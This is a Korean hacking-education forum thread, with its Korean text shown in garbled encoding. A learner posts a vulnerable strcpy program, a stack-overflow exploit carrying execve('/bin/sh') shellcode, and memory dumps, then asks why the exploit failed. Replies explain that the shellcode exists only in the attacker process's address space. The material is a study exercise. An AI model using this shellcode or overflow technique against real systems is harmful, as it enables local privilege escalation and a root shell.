½Ã½ºÅÛ ÇØÅ·

 1574, 71/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   answp
   http://a
   ½Ã½ºÅÛ ÇØÅ· ½Ãµµ Çߴµ¥ ½ÇÆÐÇÑ ÀÌÀ¯¸¦ ¸ð¸£°Ú½À´Ï´Ù¤Ð¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1003 [º¹»ç]


/* a.c ÄÚµå ÀÔ´Ï´Ù.*/
#include <stdio.h>
#include "dumpcode.h"
#include <stdlib.h>

int main(int argc, char *argv[])
{
  char buf[10];
  strcpy(buf, argv[1]);
  dumpcode(buf, 100);
  return 0;
}



/* attack.c ÄÚµå ÀÔ´Ï´Ù.*/

#include <stdio.h>
#include <stdlib.h>
#include "dumpcode.h"


int main(void)
{
  char shellcode[]="\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int addr;
  char buffer[1024];
  int num=28;

  memset(buffer, 0, 1024);
  memset(buffer, 'A', num);

  addr=(int)shellcode;
  buffer[num++]=addr & 0xff;
  buffer[num++]=(addr>>8) & 0xff;
  buffer[num++]=(addr>>16) & 0xff;
  buffer[num++]=(addr>>24) & 0xff;

  dumpcode(shellcode, 100);
  execl("./a", "./a", buffer, NULL);
  return 0;
}



[root@localhost test]$ ./attack
0xbfffdfa0  31 c0 b0 31 cd 80 89 c3 89 c1 31 c0 b0 46 cd 80   1..1......1..F..
0xbfffdfb0  eb 1f 5e 89 76 08 31 c0 88 46 07 89 46 0c b0 0b   ..^.v.1..F..F...
0xbfffdfc0  89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd   ...N..V...1...@.
0xbfffdfd0  80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68 00 04 08   ....../bin/sh...
0xbfffdfe0  60 53 01 40 2c 87 04 08 08 e0 ff bf 74 55 01 42   `S.@,.......tU.B
0xbfffdff0  01 00 00 00 34 e0 ff bf 3c e0 ff bf 2c 58 01 40   ....4...<...,X.@
0xbfffe000  01 00 00 00                                       ....

0xbfffdf30  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
0xbfffdf40  41 41 41 41 41 41 41 41 41 41 41 41 a0 df ff bf   AAAAAAAAAAAA....
0xbfffdf50  00 00 00 00 94 df ff bf a0 df ff bf 2c 58 01 40   ............,X.@
0xbfffdf60  02 00 00 00 e4 82 04 08 00 00 00 00 05 83 04 08   ................
0xbfffdf70  92 85 04 08 02 00 00 00 94 df ff bf d4 85 04 08   ................
0xbfffdf80  04 86 04 08 60 c6 00 40 8c df ff bf 00 00 00 00   ....`..@........
0xbfffdf90  02 00 00 00                                       ....
Illegal instruction
[root@localhost test]$

ºÒ¹ý ¸í·É¾î¶ó°í ³ª¿À¸é¼­ ¾ÈµË´Ï´Ù. °ø°ÝÀ» ÀÚµ¿À¸·Î ¸·°í Àִ°ÇÁö
¾Æ´Ô ´Ù¸¥ ÀÌÀ¯·Î ½ÇÆÐÇÑ°ÇÁö... ¿Ö ½ÇÆÐ Çß´ÂÁö ÀÌÀ¯°¡ ±Ã±ÝÇÕ´Ï´Ù.
Âü·Î°í ·¹µåÇÞ 7,9 ¿¡¼­ µÑ´Ù ½ÇÇè ÇغýÀ´Ï´Ù. RET º¯Á¶ È®½ÇÈ÷ µÆ±¸¿ä.
shellcode ¹è¿­À» Àü¿ª º¯¼ö·Î º¯°æ ÇÏ°íµµ Çߴµ¥ ¾ÈµË´Ï´Ù.
¿ø·¡ÄÚµå´Â jmp * $esp ÄÚµåÁÖ¼Ò¸¦ ³Ö¾î¼­ ÇÏ´øµ¥ Àú´Â ±×°É 뺴°í ½Ãµµ
Çغ» °Ì´Ï´Ù. ¿Ö ½ÇÆÐ Çß´ÂÁö ÀÌÀ¯¸¦ ¾Ë°í ½Í½À´Ï´Ù.

  Hit : 4255     Date : 2009/01/11 04:58



    
md.house ¾îÁ¦µµ ±×·¯´õ´Ï, Á¦°¡ ´äº¯¸¸ ´Þ¸é ±ÛÀ» Áö¿ì½Ã³×¿ä? 2009/01/11  
answp ´ÔÀÌ ¸»¾¸ ÇÑ°Å ´Ù Çغôµ¥µµ ¾ÈµË´Ï´Ù. 2009/01/11  
md.house Á¦°¡ Áö±Ý Çغôµ¥, RET º¯Á¶´Â µÆ´Âµ¥ RET °¡ °¡¸£Å°´Â ÁÖ¼Ò¿¡ ½ÇÇà°¡´ÉÇÑ Äڵ尡 µé¾îÀÖÁö ¾Ê³×¿ä. Á¦°¡ ¾ê±âÇß´ø 2¹ø° ÀÌÀ¯¿´´Âµ¥¿ä.

Àú ÇØÅ· Çغ¼¸¸Å­ Çغ» »ç¶÷ÀÔ´Ï´Ù. Á¦°¡ ¼¼»ó ¸ðµç ÀÏÀ» ´Ù ¾Æ´Â°Íµµ ¾Æ´Ï°í Ç×»ó ¿ÇÀº°Íµµ ¾Æ´ÏÁö¸¸, ÀÌ ºÐ¾ß¿¡¼­´Â ´ÔÀÌ Àú¸¦ ¹Ï¾îµµ µÉ°Í °°Àºµ¥¿ä.
2009/01/11  
answp RET °¡¸£Å°´Â ÁÖ¼Ò¿¡ ÄÚµå´Â È®½ÇÈ÷ ÀÖ½À´Ï´Ù. ù¹ø° dumpcode °á°ú º¸½Ã¸é
¸Þ¸ð¸®¿¡ ±â°è¾î Äڵ尡 µé¾î°¡ ÀÖ´Â°Ô È®½ÇÈ÷ º¸ÀÔ´Ï´Ù.
2009/01/11  
md.house RET °¡ °¡¸£Å°´Â ÁÖ¼Ò¿¡ ÄÚµå´Â ¾ø½À´Ï´Ù. 0xbffffda0 À» ¸»¾¸ÇϽô°Ŷó¸é, RET À§Ä¡¸¦ À߸ø °è»êÇß½À´Ï´Ù. 2009/01/11  
answp bffffda0 °¡ ¾Æ´Ï¶ó bfffdfa0 ÀÔ´Ï´Ù. ¾Æ±ñ ½ÇÇà °¡´ÉÇÑ Äڵ尡 ¾ø´Ù°í ÇϼÌÀݾƿä
bfffdfa0ºÎºÐ º¸¸é shellcode °¡ ÀÖ½À´Ï´Ù. ±×¸®°í bfffdfa0¸¦ ¸®ÅÏ ¾îµå·¹½º ºÎºÐ¿¡
¾È³Ö°í jmp * $esp ³ÖÀ¸¸é ¼º°øÇÕ´Ï´Ù. ´ÜÁö ¿Ö bfffdfa0³Ö¾úÀ»¶© ¿Ö ¾ÈµÉ±î°¡ ±Ã±ÝÇÑ°ÅÁÒ
2009/01/11  
sjh21a attack buffer != a buffer 2009/01/12  
sjh21a °¢ ÇÁ·Î¼¼½º´Â °¢°¢ÀÇ °¡»ó ¸Þ¸ð¸® °ø°£À» °®½À´Ï´Ù. 2009/01/12  
hahah ½©ÄÚµå´Â attack¿¡¼­¸¸ Á¸ÀçÇÏ´Â º¯¼öÀÏ»ÓÀÌÁÒ. execl·Î a¸¦ ½ÇÇàÇÏ¸é ±× º¯¼ö´Â ´õÀÌ»ó Á¸ÀçÇÏÁö ¾Ê½À´Ï´Ù. a.c¿¡ ÀÖ´Â dumpcodeÃâ·ÂÀ» Á»´õ Çغ¸¼¼¿ä. 0xbfffdfa0¿£ ½©ÄÚµå ¾øÀ»°Ì´Ï´Ù. 2009/01/12  
answp ¿À¤Ñ¤Ñ Àû¾îµµ ÀÌ·± ´ä À» ¿øÇß´Ù±¸¿ä~ 2009/01/12  
answp ±Ùµ¥ ¾î°¼­ ·¹µåÇÞ7¿¡¼± eggshell ·Î´Â ¼º°øÀ» ÇÒ±î¿ä? eggshell À̶û a.c ÆÄÀÏÀ̶û ¸Þ¸ð¸®°¡ ´Ù¸¦ÅÙµ¥¿ä 2009/01/12  
174   ¼ø°£º¹±¸¹®ÀÇ[1]     mk6008
01/06 2972
173   ½ÃÀÛ Çսô٠ÇØÅ· // ? ħÅõ Çϴ°Š¾î¶»°Ô ?? (ÇØÅ· Àü¹®°¡´Ô ´äº¯ //)[8]     afullmoon74
06/29 5191
172   ½Ã¸ð½º ¾ÏÈ£ Ǫ´Â ¹æ¹ý¾Ë·ÁÁÖ¼¼¿ä!![2]     injaem
04/11 6247
171   ½Ã½ºÅÛ ÀÚ¿ø ¹®Á¦     savNi
02/27 3050
170   ½Ã½ºÅÛ À» Å©·¢Çغ¸°í ½ÍÀº´ë¿ä..[1]     sjj1507
08/05 3251
169   ½Ã½ºÅÛ ÇØÅ· 23°­¿¡¼­ sh: syntax error near unexpercted token '(ÀÌ»óÇѹ®ÀÚ)'[2]     vbvbdldh
12/13 3271
168   ½Ã½ºÅÛ ÇØÅ· : ¸®´ª½º ±âÃÊÆí(¾ÆÀÌÇǺ¸´Â¹ý)[1]     rjsdn1578
11/03 3409
167   ½Ã½ºÅÛ ÇØÅ· Linux Ãʺ¸¿¡¼­ dumpÄڵ忡¼­ ¸·Çô¼­ Áú¹®µå¸³´Ï´Ù ¤Ð[1]     yelohair354
03/31 3920
166   ½Ã½ºÅÛ ÇØÅ· Æ÷Æ®Æ÷¿öµù Áú¹®[5]     qwaszx587
12/20 2094
165   ½Ã½ºÅÛ ÇØÅ· ¹× È­ÀÌÆ® ÇØÄ¿¸¦ ÇÏ°í ½ÍÀºµ¥¿ä...     ·çÀÌÁî
01/21 3427
164   ½Ã½ºÅÛ ÇØÅ· ½ÃÀÛÇÒ·Á°í,.,,[4]     youngjin94
07/09 3932
  ½Ã½ºÅÛ ÇØÅ· ½Ãµµ Çߴµ¥ ½ÇÆÐÇÑ ÀÌÀ¯¸¦ ¸ð¸£°Ú½À´Ï´Ù¤Ð¤Ð[11]     answp
01/11 4254
162   ½Ã½ºÅÛ ÇØÅ·?[1]     ºÒ¾ÈÇØ..
04/21 4809
161   ½Ã½ºÅÛ ÇØÅ·À» ÇÏ·Á¸é[3]     Z2ong2
07/17 4058
160   ½Ã½ºÅÛ ÇØÅ·À» ÇÏ¸é ¹«¾ùÀÌ ÀÌÀÍÀΰ¡¿ä? [2]     ¹ÎÁÖÈ­
11/24 3227
159   ½Ã½ºÅÛ ÇØÅ·°­Á 21°­ºÎÅÍ ÀÚ·á ºÎŹµå·Áµµ µÉ±î¿ä?     sexissports
06/23 2461
158   ½Ã½ºÅÛ ÇØÅ·¿¡ °ü·ÃÇؼ­ °øºÎ¹ýÀ» Áú¹® µå¸®°í ½Í½À´Ï´Ù.[2]     ahnjungyu
01/29 3570
157   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1762
156   ½Ã½ºÅÛ ´Ù¿î‰ç´Âµ¥.     imotar
03/31 3222
155   ½Ã½ºÅÛ º¸¾È ¼³Á¤µÈ ÄÄÇ»ÅÍ·Î ¹«¼±ÀÎÅÍ³Ý ¹æ¹ý     laiqu88
11/21 3701
[1].. 71 [72][73][74][75][76][77][78][79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org